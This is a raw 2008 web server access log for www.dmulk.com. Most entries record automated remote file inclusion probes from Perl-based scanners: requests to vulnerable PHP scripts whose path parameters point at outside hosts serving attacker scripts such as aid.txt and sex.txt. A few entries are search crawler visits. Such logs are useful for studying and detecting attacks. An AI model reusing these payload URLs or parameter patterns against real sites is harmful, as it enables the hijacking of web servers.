91.121.143.183 - - [10/Aug/2008:09:26:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:31 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:31 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:26:38 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:26:38 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:26:38 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:26:39 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:41 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:41 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:41 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:42 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:42 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:42 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:42 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:26:42 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:26:42 -0700] "GET /logs/access_080404.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:56 -0700] "GET /logs/access_080308.log/index.php?redir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:09:27:07 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:27:07 -0700] "GET /logs/access_080404.log/index.php?redir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:27:57 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 200 60002 "-" "libwww-perl/5.79" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:28:00 -0700] "GET //?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:09:28:40 -0700] "GET /bikes/?M=A HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:29:19 -0700] "GET /logs/access_080724.log//config/dbutil.bck.php?confdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:29:19 -0700] "GET //config/dbutil.bck.php?confdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:29:20 -0700] "GET /logs/access_080714.log//config/dbutil.bck.php?confdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:29:21 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:30:45 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:30:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:30:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:09:31:36 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:09:31:38 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18471 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.17.162.125 - - [10/Aug/2008:09:31:41 -0700] "GET /logs/access_080303.log/index.php?dir=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.162.125 - - [10/Aug/2008:09:31:43 -0700] "GET /index.php?dir=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 18415 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.162.125 - - [10/Aug/2008:09:31:44 -0700] "GET /logs/index.php?dir=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:33:15 -0700] "GET //citywriter/head.php?path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:33:16 -0700] "GET /logs/access_080714.log//citywriter/head.php?path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:33:16 -0700] "GET /logs//citywriter/head.php?path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:33:25 -0700] "GET /logs/access_080118.log//citywriter/head.php?path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:33:30 -0700] "GET /logs/access_080127.log/index.php?checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:33:38 -0700] "GET /index.php?checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:33:41 -0700] "GET /logs/index.php?checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:33:42 -0700] "GET /logs/access_080114.log/index.php?checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:34:03 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:09:34:44 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:09:34:45 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:35:00 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:35:04 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:35:05 -0700] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:35:05 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:35:58 -0700] "GET /logs/access_080110.log//claroline/phpbb/page_tail.php?includePath=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:36:18 -0700] "GET /logs/access_080330.log//config/dbutil.bck.php?confdir=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:39:10 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:39:10 -0700] "GET /phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:39:10 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:40:57 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:41:57 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:41:58 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:43:46 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [10/Aug/2008:09:44:06 -0700] "GET /logs//index.php?view=page&pagename=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
59.126.46.141 - - [10/Aug/2008:09:44:14 -0700] "GET //index.php?view=page&pagename=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 5829 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:09:44:24 -0700] "GET /bikes/dteel/2008_02_15/?M=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.209.65.145 - - [10/Aug/2008:09:45:47 -0700] "GET /logs/index.php?sayfa=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.209.65.145 - - [10/Aug/2008:09:45:49 -0700] "GET /index.php?sayfa=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.17.162.125 - - [10/Aug/2008:09:45:55 -0700] "GET /logs/access_080213.log/index.php?dir=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:46:20 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:47:18 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:47:41 -0700] "GET /phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:48:07 -0700] "GET /logs/access_080218.log///vwar/backup/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:49:13 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:49:13 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:09:49:46 -0700] "GET /logs/access_080404.log/bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:09:49:46 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:09:49:47 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:09:49:47 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:09:49:47 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:09:49:47 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:49:56 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:50:26 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:50:45 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:50:45 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:51:02 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.181.32.76 - - [10/Aug/2008:09:51:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:51:54 -0700] "GET /logs/access_080308.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:51:58 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:09:52:23 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:52:32 -0700] "GET /logs/access_080404.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.220 - - [10/Aug/2008:09:53:03 -0700] "GET /logs//main.php?sayfa=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [10/Aug/2008:09:53:04 -0700] "GET //main.php?sayfa=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:53:12 -0700] "GET /logs/access_080308.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:53:15 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:53:18 -0700] "GET /logs/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:09:53:29 -0700] "GET /logs/access_080308.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:09:53:31 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:09:53:43 -0700] "GET /logs/access_080404.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:09:53:52 -0700] "GET /logs/access_080404.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:09:54:33 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.810" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:54:38 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:54:45 -0700] "GET //ashnews.php?pathtoashnews=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:54:45 -0700] "GET /logs/access_080724.log//ashnews.php?pathtoashnews=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:54:45 -0700] "GET /logs//ashnews.php?pathtoashnews=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:54:46 -0700] "GET /logs/access_080404.log//ashnews.php?pathtoashnews=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.237.105.93 - - [10/Aug/2008:09:55:04 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:09:55:09 -0700] "GET //?commonpath=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18355 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:09:55:09 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:56:17 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:56:18 -0700] "GET /logs/access_080404.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:56:19 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:56:20 -0700] "GET /logs/access_080321.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:57:06 -0700] "GET /logs/access_080714.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:09:57:13 -0700] "GET /logs/access.log/index.php?sayfa=http://www.naturopathic.org/images/bulletins/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:09:57:13 -0700] "GET /logs/index.php?sayfa=http://www.naturopathic.org/images/bulletins/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:09:57:14 -0700] "GET /index.php?sayfa=http://www.naturopathic.org/images/bulletins/mic22.txt??? HTTP/1.1" 200 18431 "-" "libwww-perl/5.813" "www.dmulk.com"
218.189.211.14 - - [10/Aug/2008:09:57:45 -0700] "GET /logs//main.php?sayfa=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [10/Aug/2008:09:57:45 -0700] "GET //main.php?sayfa=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:57:50 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:09:58:13 -0700] "GET /logs/access.log/index.php?sayfa=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:58:13 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:09:58:14 -0700] "GET /index.php?sayfa=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 200 18429 "-" "libwww-perl/5.813" "www.dmulk.com"
